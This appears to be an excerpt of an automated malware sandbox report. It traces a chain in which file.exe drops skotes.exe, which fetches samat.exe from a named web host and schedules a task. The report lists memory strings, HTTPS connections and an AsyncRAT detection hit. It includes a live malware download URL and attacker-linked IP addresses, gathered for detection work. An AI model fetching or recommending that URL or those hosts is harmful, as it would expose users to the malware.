                    Source: samat.exe, 00000008.00000003.3002201844.000001BCCBFC1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4557702763.000001BCCC500000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008392971.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                    Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/Pp
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
                    Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
                    Source: samat.exe, 00000008.00000003.3015789886.000001BCCC368000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC35F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
                    Source: samat.exe, 00000008.00000003.3016877538.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014481401.000001BCCC494000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014733441.000001BCCC495000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                    Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
                    Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
                    Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
                    Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
                    Source: skotes.exe, 00000006.00000003.2967423453.000000000113A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2967280151.000000000113A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thedotmediagroup.com/samat.exe
                    Source: skotes.exe, 00000006.00000003.2967423453.000000000111F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thedotmediagroup.com/samat.exe4
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
                    Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
                    Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
                    Source: samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
                    Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
                    Source: samat.exe, 00000008.00000003.4523254156.000001BCCC351000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510813361.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4533987100.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505782582.000001BCCC34F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506796860.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503973184.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518665999.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547284877.000001BCCC355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                    Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                    Source: samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4569235767.00007FF8A88D4000.00000002.00000001.01000000.00000015.sdmp, samat.exe, 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.openssl.org/H
                    Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                    Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
                    Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                    Source: samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                    Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                    Source: samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                    Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                    Source: unknownHTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
                    Source: C:\Windows\System32\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,8_2_00007FF8B7EB5CD0

                    System Summary

                    barindex
                    Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E69647_2_00007FF7E12E6964
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C89E07_2_00007FF7E12C89E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E5C007_2_00007FF7E12E5C00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E08C87_2_00007FF7E12E08C8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C10007_2_00007FF7E12C1000
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12DDA5C7_2_00007FF7E12DDA5C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CA2DB7_2_00007FF7E12CA2DB
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D19447_2_00007FF7E12D1944
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D21647_2_00007FF7E12D2164
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D39A47_2_00007FF7E12D39A4
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E08C87_2_00007FF7E12E08C8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E64187_2_00007FF7E12E6418
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CA4747_2_00007FF7E12CA474
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CACAD7_2_00007FF7E12CACAD
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D1B507_2_00007FF7E12D1B50
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E3C107_2_00007FF7E12E3C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D2C107_2_00007FF7E12D2C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E5E7C7_2_00007FF7E12E5E7C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D9EA07_2_00007FF7E12D9EA0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12DDEF07_2_00007FF7E12DDEF0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D1D547_2_00007FF7E12D1D54
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D5D307_2_00007FF7E12D5D30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12DE5707_2_00007FF7E12DE570
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D35A07_2_00007FF7E12D35A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E18747_2_00007FF7E12E1874
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E40AC7_2_00007FF7E12E40AC
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D80E47_2_00007FF7E12D80E4
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D17407_2_00007FF7E12D1740
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E97287_2_00007FF7E12E9728
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D87947_2_00007FF7E12D8794
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12D1F607_2_00007FF7E12D1F60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12C98007_2_00007FF7E12C9800
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E69648_2_00007FF7E12E6964
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C10008_2_00007FF7E12C1000
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12DDA5C8_2_00007FF7E12DDA5C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CA2DB8_2_00007FF7E12CA2DB
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D19448_2_00007FF7E12D1944
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D21648_2_00007FF7E12D2164
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D39A48_2_00007FF7E12D39A4
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C89E08_2_00007FF7E12C89E0
